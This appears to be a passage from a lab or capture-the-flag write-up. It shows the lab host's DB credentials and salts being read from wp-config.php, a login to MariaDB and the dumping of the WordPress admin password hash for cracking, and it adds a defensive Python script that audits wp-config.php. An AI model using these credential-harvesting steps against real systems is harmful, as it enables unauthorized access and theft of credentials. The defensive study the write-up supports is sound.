MySQL


Checking for DB credentials after performing a manual system enumeration

redis@readys:/var/www/html$ head -n 60 wp-config.php | grep -v '^[#/*]'
<?php
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
 
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'karl' );
define( 'DB_PASSWORD', 'Wordpress1234' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
 
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'U&5t_g6qETo;aW<*v0?ZhvVe)AA*YK1htIP[MQ|;4b:(3zn4mr}ZhB=}COD%Dj.v' );
define( 'SECURE_AUTH_KEY',  'CkTq*B;w+Y5W;x8(8>LbY_t/K87zY=VZF9xzj@ n,_.!J=J?//-n/,j0}_}6yjN5' );
define( 'LOGGED_IN_KEY',    'V*hjSgk5{ FIjoe!d[2{U!4dn?%(5q 5v!%KYQ-qY[U7x+C@zJ$h^6ZsOt<qLnoY' );
define( 'NONCE_KEY',        '3[W^SusVixH:eLWy&Gpgg_eV`uW?_f_zWZ].X^t6;vSL#i~/seZjo)T?[-PjgvpR' );
define( 'AUTH_SALT',        '2{pjQXVVH5j|w^qs8ebjHd}-B~{EDixVAT1,2BS}W~{x!*eCF6>wU:y<6zKci^qM' );
define( 'SECURE_AUTH_SALT', '8geS0)8+9m@xeRzw:L#+f{9{5w;)?LQlw)]$j:>Fo7=Z9Sr5ooZ^TH[7s5zD{Tm1' );
define( 'LOGGED_IN_SALT',   'xD@a0!V[#V(o]5?8R]~JTgmjr)ck6C#LNhx|#OgR4|):-32EP6OW2FVR:4BM.At~' );
define( 'NONCE_SALT',       '||qT!4-3-OSwQiO@.OfrFhkEZnI_8fyi$ne6#!m_3uUd=-GEZ^mA<-2_%3=Eje+a' );

DB credential found in the wp-config.php file: karl:Wordpress1234

This was discovered by PEAS as well.
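A defender-side check for the exposure shown above, as an added example that is not part of the original notes: it parses the define() constants of a wp-config.php and flags a world-readable file mode and a guessable DB_PASSWORD. The 0644 mode, the 16-character threshold and the function names are assumptions; the sample DB_* values are the ones from the output above.

```python
import os
import re
import stat
import tempfile

# Matches define( 'NAME', 'value' ); with single or double quotes.
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*(['"])(.*?)\2\s*\)\s*;""")

def parse_defines(text):
    """Return {constant: value} for every string define() in wp-config text."""
    return {m.group(1): m.group(3) for m in DEFINE_RE.finditer(text)}

def audit_wp_config(path):
    """Return a list of findings for one wp-config.php file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"world-readable (mode {mode:04o}); restrict to 0640 or tighter")
    with open(path, encoding="utf-8", errors="replace") as fh:
        cfg = parse_defines(fh.read())
    pw = cfg.get("DB_PASSWORD", "")
    if len(pw) < 16:  # assumed minimum length, adjust to local policy
        findings.append("DB_PASSWORD shorter than 16 characters")
    # Passwords built from the application, database or account name are guessable.
    words = {"wordpress", cfg.get("DB_NAME", ""), cfg.get("DB_USER", "")} - {""}
    for word in sorted(words):
        if word.lower() in pw.lower():
            findings.append(f"DB_PASSWORD contains the guessable word '{word}'")
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is root; use a per-application account")
    return findings

def demo():
    # Constructed sample reproducing the DB_* lines shown above.
    sample = (
        "<?php\n"
        "define( 'DB_NAME', 'wordpress' );\n"
        "define( 'DB_USER', 'karl' );\n"
        "define( 'DB_PASSWORD', 'Wordpress1234' );\n"
        "define( 'DB_HOST', 'localhost' );\n"
    )
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "wp-config.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, 0o644)  # assumed mode; the notes do not show it
        return audit_wp_config(path)

if __name__ == "__main__":
    for finding in demo():
        print("[!]", finding)
```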

redis@readys:~$ mysql -ukarl -pWordpress1234
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 36
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 
MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

Session established

MariaDB [wordpress]> SELECT user_login,user_pass FROM wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 |
+------------+------------------------------------+
1 row in set (0.000 sec)

Exfiltrating the credential hash of the admin user: $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0

hashcat was unable to crack the password hash.